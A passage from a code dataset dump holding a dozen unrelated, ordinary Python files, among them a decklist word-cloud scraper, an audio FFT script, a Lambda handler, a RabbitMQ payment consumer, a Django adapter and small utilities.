np.random.uniform(low=8, high=20, size=inlierCount)\n urlCounts = np.random.uniform(low=1, high=5, size=inlierCount)\n averageURLAccessCounts = np.random.uniform(low=1, high=10, size=inlierCount)\n X1 = np.c_[\n np.array(locations),\n np.array(weekdays),\n np.array(times),\n np.array(urlCounts),\n np.array(averageURLAccessCounts)]\n if not outlierCount:\n return type('Dataset', (object,), dict(data=X1))\n # Make abnormal data\n locations = make_blobs(n_samples=outlierCount, n_features=2, centers=3)[0]\n weekdays = [random.choice(xrange(7)) for x in xrange(outlierCount)]\n times = np.random.uniform(low=0, high=23, size=outlierCount)\n urlCounts = np.random.uniform(low=1, high=1000, size=outlierCount)\n averageURLAccessCounts = np.random.uniform(low=1, high=1000, size=outlierCount)\n X2 = np.c_[\n np.array(locations),\n np.array(weekdays),\n np.array(times),\n np.array(urlCounts),\n np.array(averageURLAccessCounts)]\n return type('Dataset', (object,), dict(data=np.r_[X1, X2]))\n","repo_name":"crosscompute/analytical-tutorials","sub_path":"20120607-computational-analysis/scripts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"48"} +{"seq_id":"39557481367","text":"import streamlit as st\nimport matplotlib.pyplot as plt\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom wordcloud import WordCloud\nfrom collections import Counter\n\n\n# http://amueller.github.io/word_cloud/auto_examples/colored_by_group.html\nclass SimpleGroupedColorFunc(object):\n \"\"\"Create a color function object which assigns EXACT colors\n to certain words based on the color to words mapping\n\n Parameters\n ----------\n color_to_words : dict(str -> list(str))\n A dictionary that maps a color to the list of words.\n\n default_color : str\n Color that will be assigned to a word that's not a member\n of any value from color_to_words.\n \"\"\"\n\n def __init__(self, color_to_words, default_color):\n self.word_to_color = {word: color\n for (color, words) in color_to_words.items()\n for word in words}\n\n self.default_color = default_color\n\n def __call__(self, word, **kwargs):\n return self.word_to_color.get(word, self.default_color)\n\n\ndef main():\n decklists_url = \"https://magic.wizards.com/en/content/deck-lists-magic-online-products-game-info\"\n st.header('MTGO Decklists - Wordcloud Generator')\n st.write(\"Insert the URL containing the decklists.\")\n st.write(f\"You can find them here: {decklists_url}\")\n\n # Working example to start the app.\n decklists_data = requests.get(decklists_url)\n decklists_soup = BeautifulSoup(decklists_data.content, 'html.parser')\n\n base_url = 'https://magic.wizards.com'\n modern_url = decklists_soup.select_one(\"a[href*=modern-challenge]\")\n if not modern_url:\n modern_url = decklists_soup.select_one(\"a[href*=modern-preliminary]\")\n\n default_url = urljoin(base_url, modern_url.get('href'))\n # default_url = 'https://magic.wizards.com/en/articles/archive/mtgo-standings/modern-challenge-2020-08-16'\n # Input box\n url = st.text_input('URL: ', default_url)\n # Preventing some malicious use.\n valid_url = url.startswith('https://magic.wizards.com/')\n \n if not valid_url:\n st.write('Insert a valid URL from the official mtgo-standings.')\n if valid_url:\n try:\n fig = build_wordcloud(url)\n # Without these options the figure has an annoying white border.\n st.pyplot(fig, transparent=True, bbox_inches='tight', 
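
SimpleGroupedColorFunc above is applied in two steps, generate then recolor; a Streamlit-free sketch that reuses the class defined above (the colour-to-word mapping here is made up):

from wordcloud import WordCloud

freqs = {"Island": 5, "Mountain": 3}
cloud = WordCloud(width=200, height=100).generate_from_frequencies(freqs)
grouped = SimpleGroupedColorFunc({"#67c1f5": ["Island"], "#f85555": ["Mountain"]},
                                 default_color="grey")
cloud.recolor(color_func=grouped)
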
pad_inches=0)\n except ValueError:\n st.write('The URL does not contain decklists or they changed the layout.')\n\n\ndef build_wordcloud(url):\n \"\"\"\n Scrape MTGO decklists from the official MTGO Archives\n and generate a matplotlib plot with a wordcloud.\n\n Parameters\n ----------\n url : str\n A valid URL from the Wizards of the Coast website\n containing decklists.\n \"\"\"\n\n site_data = requests.get(url)\n soup = BeautifulSoup(site_data.content, 'html.parser')\n\n containers = soup.find_all('div', attrs={'class': 'sorted-by-overview-container'})\n\n # Each decklist is contained in one of those divs.\n decklists = [container.find_all('span', attrs={'class': 'row'}) for container in containers]\n\n card_list = list()\n for decklist in decklists:\n for card in decklist:\n card_name = card.find('span', attrs={'class': 'card-name'}).get_text()\n copies = int(card.find('span', attrs={'class': 'card-count'}).get_text())\n card_list.extend(copies * [card_name])\n\n # Create a frequency dict from the list.\n card_counter = Counter(card_list)\n\n # Pick which cards are which colors.\n colors = ['white', 'blue', 'black', 'red', 'green', 'multi', 'colorless']\n color_to_words = dict()\n for color in colors:\n cards = list()\n for decklist in soup.find_all('div', attrs={'class': f'sorted-by-{color}'}):\n for card in decklist.find_all('span', attrs={'class': 'card-name'}):\n cards.append(card.get_text())\n color_to_words[color] = cards\n\n # Assign a specific RGB color for each of the MTG colors.\n # I took these from the original mana symbols.\n color_to_words['#fcfcc1'] = color_to_words.pop('white')\n color_to_words['#67c1f5'] = color_to_words.pop('blue')\n color_to_words['#846484'] = color_to_words.pop('black')\n color_to_words['#f85555'] = color_to_words.pop('red')\n color_to_words['#26b569'] = color_to_words.pop('green')\n color_to_words['#cfaa4a'] = color_to_words.pop('multi')\n color_to_words['#6b5441'] = color_to_words.pop('colorless')\n\n # Create a set containing the lands to filter them out.\n lands_list = set()\n for decklist in soup.find_all('div', attrs={'class': 'sorted-by-land'}):\n for card in decklist.find_all('span', attrs={'class': 'card-name'}):\n lands_list.add(card.get_text())\n\n for card in lands_list:\n del card_counter[card]\n\n\n cloud = WordCloud(\n background_color='black',\n width=400,\n height=250,\n scale=5,\n ).generate_from_frequencies(card_counter)\n\n # Apply the chosen colors to the wordcloud.\n grouped_color_func = SimpleGroupedColorFunc(color_to_words, default_color='black')\n cloud.recolor(color_func=grouped_color_func)\n\n # Plot the cloud to matplotlib.\n # Normally, you'd call plt.show() to show the plot.\n fig = plt.figure(figsize = (16,9))\n plt.imshow(cloud)\n plt.axis(\"off\")\n return fig\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"tkleyton/mtgo_wordcloud_generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21208453514","text":"import pyaudio\nimport os\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.fftpack import fft\nimport time\n\n\n# constants\nCHUNK = 1024 # samples per frame\nFORMAT = pyaudio.paInt16 # audio format (bytes per sample?)\nCHANNELS = 1 # single channel for microphone\nRATE = 44100 # samples per second\n\nfreqRange = np.array([500,2000])\nfreqBlock = freqRange*(2*CHUNK)/(RATE)\n\n\n#for discrete counting\nglobvar = 0\ncount = 
0\n\ndef incORnot():\n    global globvar\n    if ((globvar) == 0):\n        (globvar) = 1\n        return 1\n    return 0\n\n# pyaudio class instance\np = pyaudio.PyAudio()\n\n# stream object to get data from microphone\nstream = p.open(\n    format=FORMAT,\n    channels=CHANNELS,\n    rate=RATE,\n    input=True,\n    output=True,\n    frames_per_buffer=CHUNK\n)\n\n\nxf = np.linspace(0, RATE, CHUNK) # frequencies (spectrum)\n\n\nprint('stream started')\n\n\nwhile True:\n    # binary data\n    data = stream.read(CHUNK) \n    \n    # convert data to integers, make np array, then offset it by 127\n    data_int = struct.unpack(str(2 * CHUNK) + 'B', data)\n    \n    avgData = np.sum(data_int)/(len(data_int))\n    avgPower = 20*np.log10(avgData/255)\n\n    print(avgPower)\n    # compute FFT and update line\n    yf = fft(data_int)\n    yf_data = (np.abs(yf[int(freqBlock[0]):int(freqBlock[1])]) / (128 * CHUNK))\n    \n    power = 20*np.log10(yf_data)\n\n\n\n#    print(np.max(power))\n    \n#    if((np.max(power)) > -12):\n#        if (incORnot() == 1):\n#            count = count + 1\n#            print(\"HI\")\n#    elif ((np.max(power)) < -30):\n#        globvar = 0\n    \n#    if(np.max(power) > -15):\n#        print(np.max(power), count)\n\n\n","repo_name":"AwaleSajil/test","sub_path":"part3.py","file_name":"part3.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6729824332","text":"# import requests\nimport logging\nimport json\nimport os\nfrom urllib.parse import parse_qs\nfrom lastlink.link import Link\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nif os.environ.get('Environment', 'Test') == 'Prod':\n    logger.setLevel(logging.INFO)\n\n\ndef params_from_headers(headers, body, queryString):\n    # Handles content both as JSON and WWW form - also queryString\n    logger.debug(headers)\n    logger.debug(body)\n    cf = \"Content-Type\"\n    parameters = {}\n    if cf not in headers:\n        cf = cf.lower()\n    if cf not in headers and queryString is None:\n        logger.error(\"Invalid Event: Payload has no Content-Type header\")\n        raise Exception(\"Content-Type not found\")\n    elif cf in headers:  # only inspect the header when present; query-string-only requests fall through\n        if headers[cf].startswith(\"application/x-www-form-urlencoded\"):\n            parameters = parse_qs(body)\n            parameters = dict([(x, y[0]) for x, y in parameters.items()])\n        elif headers[cf].startswith(\"application/json\"):\n            parameters = json.loads(body)\n        else:\n            logger.error(\"Content is of type {} and not supported\".format(headers[cf]))\n            raise Exception(\"Unsupported Content Type\")\n    parameters.update(queryString)\n    return parameters\n\n\ndef lambda_handler(event, context):\n    if \"httpMethod\" not in event or \"headers\" not in event:\n        logger.error(\"Invalid Event Triggered: No HTTP Method and/or headers Found!\")\n        raise Exception(\"Invalid Resource\")\n    try:\n        parameters = params_from_headers(event[\"headers\"],\n                                         event.get(\"body\", None),\n                                         event.get('queryStringParameters', {}))\n    except Exception as e:\n        raise Exception(e)\n    linkId = parameters.get('linkid', 'TEST')\n    link = Link(linkId)\n    if event['httpMethod'] == 'POST':\n        if 'newlink' not in parameters:\n            raise Exception(\"NewLink not set\")\n        newlink = parameters['newlink']\n        link.set_latest_link(newlink)\n    elif link.latest_link is None:\n        raise Exception(\"Link ID %s Not Found\" % linkId)\n    return {\"statusCode\": 200,\n            \"headers\": {\"Content-Type\": \"text/plain\"},\n            \"body\": 
link[\"Node\"]}\n","repo_name":"trafficone/LastLink","sub_path":"src/lastlink/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3748497410","text":"from typing import List\n\n\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n def dfs(coins, remain, memo):\n if remain in memo:\n return memo[remain]\n if remain == 0:\n # handle base save state\n return 0\n if remain < 0:\n # handle base discard\n return -1\n\n minCount = float('inf')\n for coin in coins:\n count = dfs(coins, remain - coin, memo)\n if count == -1: continue\n minCount = min(minCount, count + 1)\n\n memo[remain] = minCount\n return minCount if minCount != float('inf') else -1\n\n return dfs(coins, amount, {})\n\nif __name__ == '__main__':\n coins = [2, 3, 5]\n s = Solution()\n print(s.coinChange(coins, 8))","repo_name":"jprice8/interview-prep","sub_path":"dynamic-programming/coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70897355026","text":"import pika\nfrom retry import retry\nfrom card_validator import Validator\nimport json\nfrom models.card_model import CardModel\nfrom models.payment_model import PaymentModel\nfrom notifier import PaymentNotifier\nfrom payment_repository import PaymentRepository\nfrom container import Container\nfrom Settings import Settings\n\n\n@retry(pika.exceptions.AMQPConnectionError, delay=5, jitter=(1, 3))\ndef get_connection():\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host='rabbit1', port=5672)\n )\n\n channel = connection.channel()\n channel.queue_declare('order')\n channel.queue_declare('payment')\n return channel\n\n\ndef callback(ch, method, properties, body):\n body = body.decode(\"utf-8\")\n\n body = json.loads(body)\n card = CardModel(**body[\"creditCard\"])\n\n print('validating')\n valid = validator.validate(card)\n payment = PaymentModel(orderId=body[\"orderId\"], success=valid)\n repo.create_payment(payment)\n notifier.notify(json.dumps(body), valid)\n\n\ndef arrange():\n container = Container()\n container.config.from_pydantic(Settings(_env_file='.env'))\n return container\n\n\nif __name__ == '__main__':\n container = arrange()\n repo: PaymentRepository = container.payment_repository_provider()\n validator = Validator()\n notifier = PaymentNotifier()\n connection = get_connection()\n connection.basic_consume(queue='order',\n on_message_callback=callback,\n auto_ack=True)\n connection.start_consuming()\n","repo_name":"creep1g/T-302-HONN-project2","sub_path":"PaymentService/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23497336776","text":"import contextlib\nimport json\nfrom os import environ\nfrom typing import Any, Dict, List\n\nimport django\nfrom django.contrib import admin\nfrom django.core.management import call_command\nfrom django.http import HttpRequest as DjangoRequest\nfrom django.http import JsonResponse\nfrom django.urls import path\nfrom django.views.decorators.http import require_http_methods\n\nfrom py_clean_arch.application.protocols.controller_protocol import Controller\nfrom py_clean_arch.infra.http.helpers.http_request import HttpRequest\n\n\nclass Borg(object):\n _state: Dict[Any, Any] = {}\n\n 
def __new__(\n cls,\n *args,\n shared_state: bool = True,\n **kwargs,\n ):\n instance = super(Borg, cls).__new__(cls)\n if shared_state:\n instance.__dict__ = Borg._state\n return instance\n\n\ndef get_query_params_as_dict(request: DjangoRequest) -> Dict[Any, Any]:\n query_params: Dict[Any, Any] = {}\n for key, value in request.GET.items():\n values_as_list = request.GET.getlist(key)\n if len(values_as_list) > 1:\n query_params[key] = values_as_list\n continue\n query_params[key] = value\n return query_params\n\n\nclass DjangoHttpServer(Borg):\n def __init__(self) -> None:\n environ.setdefault(\n \"DJANGO_SETTINGS_MODULE\",\n \"py_clean_arch.infra.http.django_http_server.django_http_server.settings\",\n )\n django.setup()\n self.urlpatterns: List[Any] = getattr(\n self,\n \"urlpatterns\",\n [\n path(\"admin/\", admin.site.urls),\n ],\n )\n\n def serve(self, port: int = 8000) -> None:\n call_command(\"runserver\", f\"127.0.0.1:{port}\")\n\n def on(self, method: str, url: str, controller: Controller) -> None:\n url = url[1:] + \"/\"\n\n @require_http_methods([method.upper()])\n def view(request: DjangoRequest, *args, **kwargs) -> Any:\n applicaton_request = HttpRequest(\n body=self.__get_body_as_dict(request),\n params=get_query_params_as_dict(request),\n headers=request.headers,\n )\n output = controller.handle(request=applicaton_request)\n return JsonResponse(\n output.body, status=output.status_code, headers=output.headers\n )\n\n self.urlpatterns.append(path(url, view, name=f\"{method.upper()}-{url}\"))\n\n def __get_body_as_dict(self, request: DjangoRequest) -> Dict[Any, Any]:\n with contextlib.suppress(json.decoder.JSONDecodeError):\n return json.loads(request.body)\n return {}\n\n def __iter__(self) -> Any:\n return iter(self.urlpatterns)\n","repo_name":"erickod/py_clean_arch","sub_path":"py_clean_arch/infra/http/django_http_server/django_http_server_adapter.py","file_name":"django_http_server_adapter.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4544718584","text":"import sys, os\nimport pandas as pd\nimport numpy as np\n\ndef printBasicInfo(df1):\n\tprint (df1.shape)\n\tprint (df1.columns)\n\tprint (df1.index)\n\tprint (df1.dtypes)\n\n# to find profile that are very very similar pairs, used in matching the same sample across dataset,\n# although very close, the profile across different dataset are not identical due to processing difference\ndef find_very_close_pair(corr): \n\tN = corr.shape[0]\n\tfor col in corr.columns:\n\t\tr = corr[col].sort_values()\n\t\tprint (col, r.index[N-2], r[N-2]) # N-1 is the corr =1\n\ndef compute_N_by_N_pearson_correlation(gMatrixfile1, Na_value = 0):\n\tdf1 = pd.read_csv(gMatrixfile1, sep = '\\t', index_col = 0)\n\n\tdf1.replace(Na_value, np.nan, inplace= True)\n\n\tcorr = df1.corr(method = 'pearson')\n\n\treturn corr\n\n\n\nif len(sys.argv[:]) != 4:\n\tprint (\"python pearson_correlation_full.py gMatrix zero_value stats_outoput\\n\")\n\tprint (\"All zero_value will be treated as NA, not used to compute correlation.\\n\")\n\tsys.exit(1)\n\ngMatrixfile1 = sys.argv[1]\nNa_value = float(sys.argv[2]) # NA value\noutput = sys.argv[3]\n\ncorr = compute_N_by_N_pearson_correlation(gMatrixfile1, Na_value)\ncorr.to_csv(output, sep 
='\\t')\nfind_very_close_pair(corr)","repo_name":"ucscXena/wrangle","sub_path":"Analysis/pearson_correlation_full.py","file_name":"pearson_correlation_full.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"360130374","text":"# Define a list of several numbers. Write a program that finds the sum of the list elements at odd positions.\n\n# Example:\n# - [2, 3, 5, 9, 3] -> elements 3 and 9 are at odd positions, answer: 12\n\nfrom random import randint\n\ndef GetNumber(message):\n    isCorrect = False\n    while isCorrect == False:\n        try:\n            number = int(input(message))\n            isCorrect = True\n        except ValueError:\n            print(\"That is not a number. Please try again \")\n    return number\n\ndef InitList(number):\n    my_list = []\n    for i in range(number):\n        my_list.append(randint(0,10))\n    return my_list\n\ndef SumNotEven(my_list):\n    sum = 0\n    for i in range(1,len(my_list),2):\n        sum+=my_list[i]\n    return sum\n\nnumb = GetNumber(\"Enter the number of list elements \")\nnew_list = InitList(numb)\nsum = SumNotEven(new_list)\nprint(f'In list {new_list} the sum of the elements at odd positions is {sum}')\n","repo_name":"artem-maklashev/Python-HomeWork3","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15265137843","text":"import sys\nimport gzip\nmat=sys.argv[1]\nchr=sys.argv[2]\nfai=sys.argv[3]\nres=int(sys.argv[4])\noup1=sys.argv[5]\noup2=sys.argv[6]\n\nCID={}\nFAI=open(fai,\"r\")\nfor line in FAI:\n\tline=line.strip()\n\tlis=line.split(\"\\t\")\n\tCID[lis[0]]=int(lis[1])\nFAI.close()\n\n# integer division keeps NR an int for the column-count check below\nNR=CID[chr]//res+1\n#print(NR)\n\nif mat.endswith(\".gz\"):\n\tMAT=gzip.open(mat,\"rt\")\nelse:\n\tMAT=open(mat,'r')\nNF=0\n\nsdis={}\nndis={}\nfor line in MAT:\n\tNF+=1\n\tline=line.strip()\n\tlis=line.split(\"\\t\")\n\tnum=len(lis)\n\t#print(num)\n\tif(num!=NR):\n\t\texit(\"Matrix is not in correct format!\")\n\tfor i in range(num):\n\t\tif i+1>=NF:\n\t\t\tdis=i+1-NF\n\t\t\tndis.setdefault(dis,0.0)\n\t\t\tsdis.setdefault(dis,0.0)\n\t\t\tif(lis[i]!=\"NaN\"):\n\t\t\t\tndis[dis]+=1\n\t\t\t\tsdis[dis]+=float(lis[i])\n\t\telse:\n\t\t\tcontinue\nMAT.close()\n#print(NF)\nif (NF!=NR):\n\texit(\"Matrix is not in correct format!\")\n##############generate_expected_value\nEP={}\nOUP=open(oup1,'w')\nfor key in sorted(sdis.keys()):\n\tEP[key]=sdis[key]/ndis[key]\n\tOUP.writelines(str(key)+'\\t'+str(sdis[key]/ndis[key])+'\\t'+chr+'\\t'+str(key*res)+\"\\n\")\nOUP.close()\n###############generate_oe_matrix\n#OUP=gzip.open(oup2,'wt',compresslevel=1)\nOUP=open(oup2,'w')\nif mat.endswith(\".gz\"):\n    MAT=gzip.open(mat,\"rt\")\nelse:\n    MAT=open(mat,'r')\nNF=0\nfor line in MAT:\n\tNF+=1\n\tline=line.strip()\n\tlis=line.split(\"\\t\")\n\tnum=len(lis)\n\tlout=[]\n\tfor i in range(num):\n\t\tdis=abs(i+1-NF)\n\t\t#if sdis[dis]/ndis[dis]==0:\n\t\tif EP[dis]==0:\n\t\t\tlout.append(str(0))\n\t\telse:\n\t\t\t#exp=sdis[dis]/ndis[dis]\n\t\t\tlout.append(str(float(lis[i])/EP[dis]))\n\tOUP.writelines(\"\\t\".join(lout)+\"\\n\")\nOUP.close()\n","repo_name":"JiamanZhang/Lab_Porcine-Adiposes_paper_codes","sub_path":"Lab_OE_matrix/codes/generate.oe.matrix.py","file_name":"generate.oe.matrix.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37655091915","text":"from bs4 import BeautifulSoup as BS\nfrom urllib.request 
import urlopen\nimport pandas\nimport codecs\n\n\n\nclass Movie():\n title = None\n director = None\n section = None\n duration = None\n synopse = None\n\n def __dict__(self):\n return {\"title\": self.title, \"director\": self.director, \"section\": self.section, \"duration\": self.duration,\n \"synopse\": self.synopse}\n\n\ndef URL2BS(url):\n f = urlopen(url)\n page_raw = f.read()\n f.close()\n\n return BS(page_raw, \"html.parser\")\n\n\ndef isSectionBanned(df, banned):\n filter = df['section'].str.contains(banned) == False\n\n return filter\n\n\nmovielist = []\n\nbanned = \"urts|Brigadoon|Espai|Serial|SGAE|Petit|ort\"\n\nsitges = \"http://www.sitgesfilmfestival.com/cat/programa/pel_licules\"\n\nhtml = URL2BS(sitges)\n\nrows = html.findAll(\"div\", {\"class\": \"right-banner-bottom\"})\n\nfor row in rows:\n\n movie = Movie()\n movie.title = row.h3.a.text\n movie.director = row.h6.text\n movie.section = row.p.text\n\n link = row.h3.a\n link = link.get('href')\n sub_html = URL2BS(link)\n\n try:\n movie.synopse = sub_html.find(\"div\", {\"class\": \"section_sinopsi\"}).p.text\n except:\n None\n try:\n movie.duration = sub_html.find(\"div\", {\"class\": \"section_fitxa_artistica\"}).p.strong.text\n except:\n None\n\n d = movie.__dict__()\n movielist.append(d)\n\ndf = pandas.DataFrame(movielist)\ndf.sort_values(by=[\"title\"], inplace=True)\n\n# print(df['section'].value_counts())\n\nprint(df[isSectionBanned(df, banned)].to_html(columns=[\"title\", \"director\", \"section\", \"synopse\", \"duration\"]))\n\n","repo_name":"Clon01/sitges-scrapper","sub_path":"legacy.py","file_name":"legacy.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6826798768","text":"import collections\nimport contextlib\nimport heapq\nimport os\nimport threading\nimport time\n\nfrom core.delayedcall import DelayedCall\n\n\nclass Timeloop:\n def __init__(self, *, check_args=True):\n self._check_args = check_args\n fdin, fdout = os.pipe2(os.O_NONBLOCK|os.O_CLOEXEC)\n self._wakeupfd = os.fdopen(fdin, 'rb')\n self._signalfd = os.fdopen(fdout, 'wb')\n self._soon_lock = threading.RLock()\n self._soon = collections.deque()\n self._later = []\n self._timer = time.monotonic\n\n def call_soon(self, cb, *args):\n dc = DelayedCall(self, 0, cb, args, check_args=self._check_args)\n self._soon.append(dc)\n return dc\n\n def call_later(self, delay, cb, *args):\n if not delay:\n return self.call_soon(cb, *args)\n now = self._timer()\n when = now + delay\n dc = DelayedCall(self, when, cb, args, check_args=self._check_args)\n heapq.heappush(self._later, dc)\n return dc\n\n def call_soon_threadsafe(self, cb, *args):\n with self._soon_lock:\n ret = self.call_soon(cb, *args)\n self._signal(b'T')\n return ret\n\n def _signal(self, char):\n sent = 0\n while not sent:\n try:\n sent = self._signalfd.write(char)\n except BlockingIOError:\n pass\n\n def _process_timers(self):\n delay = 3600\n with self._soon_lock:\n soon = self._soon\n self._soon = collections.deque()\n q = self._later\n now = self._timer()\n while q:\n dc = q[0]\n if dc.cancelled:\n heapq.heappop(q)\n elif dc.when <= now:\n soon.append(dc)\n heapq.heappop(q)\n else:\n delay = min(delay, dc.when - now)\n break\n for dc in soon:\n dc()\n if self._soon:\n delay = 0\n return delay\n\n def close(self):\n self._signalfd.close()\n 
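# close the read end as well so both halves of the self-pipe are released\n        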
self._wakeupfd.close()\n","repo_name":"learnpython/advanced-01","sub_path":"asvetlov/core/timeloop.py","file_name":"timeloop.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"20387823136","text":"def rgb_to_ycbcr(img):\n    out = {\n        \"y\": [],\n        \"cb\": [],\n        \"cr\": [],\n        \"y_f\": [],\n        \"cb_f\": [],\n        \"cr_f\": []\n    }\n    pixels = list(img.getdata())\n    out[\"width\"], out[\"height\"] = img.size\n    for px in pixels:\n        r = px[0]\n        g = px[1]\n        b = px[2]\n        y = (.299 * r) + (.587 * g) + (.114 * b)\n        cb = 128 - (.169 * r) - (.331 * g) + (.500 * b)\n        cr = 128 + (.500 * r) - (.419 * g) - (.081 * b)\n        out[\"y\"].append(int(y))\n        out[\"cb\"].append(int(cb))\n        out[\"cr\"].append(int(cr))\n        out[\"y_f\"].append(y)\n        out[\"cb_f\"].append(cb)\n        out[\"cr_f\"].append(cr)\n    return out\n\n","repo_name":"tliu/jpeg","sub_path":"scripts/rgb_to_ycbcr.py","file_name":"rgb_to_ycbcr.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5728256573","text":"import numpy as np\nimport sys\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n\n\ndef make_phaseii(lstfile, savedir = ''):\n    common = {\n        'PROGRAM':'HET23-2-400',\n        'VIFU':'047',\n        'EXP':'1080',\n        'CRSPLIT':'3',\n        'INSTRUMENT':'VIRUS',\n        'GMAG':'22',\n        'SKYBRIGHT_G':'18.0',\n        'SEEING': '3.0',\n        'SKYTRANS': 'S',\n        'SKYCALS': 'Y',\n        'PRI':'0',\n        'SETUPMETHOD':'DirectGuider',\n        'DITHER':'Y',\n        'PMRA':'0',\n        'PMDEC':'0',\n        'COMMENT':'\"Usual Dither, look for new object in target IFU\"',\n    }\n    GraceID = lstfile.split('_')[1].split('.')[0]\n    with open(savedir+'submission_to_HET.tsl','w') as f:\n        f.write('COMMON\\n')\n        for key,value in common.items():\n            f.write('\\t{}\\t{}\\n'.format(key,value))\n        f.write('TRACK_LIST\\n')\n        f.write(' OBJECT\\tRA\\tDEC\\tPIPRI\\n')\n        targets = np.loadtxt(lstfile,skiprows=1,dtype=str)\n        targets = np.atleast_2d(targets)\n        c = SkyCoord(ra=np.asarray(targets[:,1], dtype=float) \\\n            * u.degree, dec = np.asarray(targets[:,2], \\\n            dtype=float)* u.degree, frame='icrs')\n        c = c.to_string('hmsdms')\n        for i,target in enumerate(targets):\n            \n            #process ra into format:\n            ra = c[i].split(' ')[0]\n            hour = \"{:2.0f}\".format(float(ra[:ra.index('h')]))\n            if hour[0] == ' ':\n                hour = '0'+hour[1:]\n            min = \"{:2.0f}\".format(float(ra[ra.index('h')+1:ra.index('m')]))\n            if min[0] == ' ':\n                min = '0'+min[1:]\n            sec = \"{:2.2f}\".format(float(ra[ra.index('m')+1:ra.index('s')]))\n            if sec[0] == ' ':\n                sec = '0'+sec[1:]\n            if len(sec) == 4:\n                sec = '0'+sec\n            ra = hour+\":\"+min+\":\"+sec\n            \n            #processing dec into format\n            dec = c[i].split(' ')[1]\n            \n            pos_neg = dec[0]\n            deg = \"{:2.0f}\".format(float(dec[1:dec.index('d')]))\n            if deg[0] == ' ':\n                deg='0'+deg[1:]\n            min = \"{:2.0f}\".format(float(dec[dec.index('d')+1:dec.index('m')]))\n            if min[0] == ' ':\n                min='0'+min[1:]\n            sec = \"{:2.2f}\".format(float(dec[dec.index('m')+1:dec.index('s')]))\n            if sec[0] == ' ':\n                sec = '0'+sec[1:]\n            if len(sec) == 4:\n                sec = '0'+sec\n            dec = pos_neg+deg+\":\"+min+\":\"+sec\n            f.write('Target{}\\t{}\\t{}\\t{}\\n'.format(target[0],ra,dec,str(int(target[0]))))\ndef main():\n    make_phaseii(sys.argv[1])\nif __name__=='__main__':\n    main()\n","repo_name":"sky5265/LIGHETR_Alert_System","sub_path":"Final 
Directory/make_phaseii.py","file_name":"make_phaseii.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41221114556","text":"# An English-Japanese dictionary in Python\nimport sys\ndicfile = \"ejdict-hand-utf8.txt\"\n\n# Check the arguments\nif len(sys.argv) < 2:\n    print(\"[USAGE] jisyo.py word\")\n    quit()\n# The specified word\nword = sys.argv[1]\n\n# Scan the dictionary data one line at a time\nwith open(dicfile, \"rt\", encoding=\"utf-8\") as fp:\n    while True:\n        line = fp.readline()\n        if not line: break\n        if word in line:\n            print(line.strip())\n\n","repo_name":"kujirahand/book-rust","sub_path":"src/ch2/jisyo.py","file_name":"jisyo.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"} +{"seq_id":"5011637943","text":"import os\nimport unittest\nimport zipfile\nfrom tempfile import TemporaryDirectory\n\nfrom galileo.apps.repository import Repository\n\nthis_dir = os.path.join(os.path.dirname(__file__))\n\n\nclass TemporaryRepositoryResource:\n    \"\"\"\n    Prepares a Repository by zipping all test apps into a temporary directory, and using that directory as root for the\n    Repository.\n    \"\"\"\n    apps_dir = os.path.join(os.path.dirname(__file__), 'repo')\n\n    tmpdir: TemporaryDirectory\n    repository: Repository\n\n    def setUp(self):\n        self.tmpdir = TemporaryDirectory(prefix='galileo_unittest_')\n        self._prepare_repo()\n\n        self.repository = Repository(self.tmpdir.name)\n\n    def tearDown(self):\n        self.tmpdir.cleanup()\n\n    def _prepare_repo(self):\n        for d in os.listdir(self.apps_dir):\n\n            app_dir = os.path.join(self.apps_dir, d)\n            with zipfile.ZipFile(os.path.join(self.tmpdir.name, '%s.zip' % d), 'w') as zipfd:\n                for root, dirs, files in os.walk(app_dir):\n                    for file in files:\n                        zipfd.write(os.path.join(root, file), file)\n\n\nclass RepositoryTest(unittest.TestCase):\n    repo = 